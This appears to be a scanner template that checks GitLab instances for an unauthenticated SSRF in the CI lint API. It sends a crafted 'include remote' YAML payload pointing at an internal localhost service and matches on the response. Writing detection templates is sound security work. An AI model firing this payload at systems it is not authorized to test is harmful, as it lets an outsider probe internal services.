id: gitlab-unauth-ssrf
info:
  name: Gitlab Unauth SSRF
  risk: Medium

params:
  - root: "{{.BaseURL}}"

replicate:
  prefixes: 'gitlab,git'

requests:
  - method: POST
    redirect: false
    url: >-
      {{.root}}/api/v4/ci/lint
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
      - Content-Type: 'application/json'
    body: |
      { "include_merged_yaml": true, "content": "include:\n  remote: http://127.0.0.1:9090/api/v1/targets?test.yml" }
    detections:
      - >-
        StatusCode() == 200 && StringSearch("body", "status: success\n") && StringSearch("resHeaders", "application/json") && StringSearch("body", "localhost")

references:
  - links:
      - https://gitlab.com/gitlab-org/gitlab/-/issues/321290
      - https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html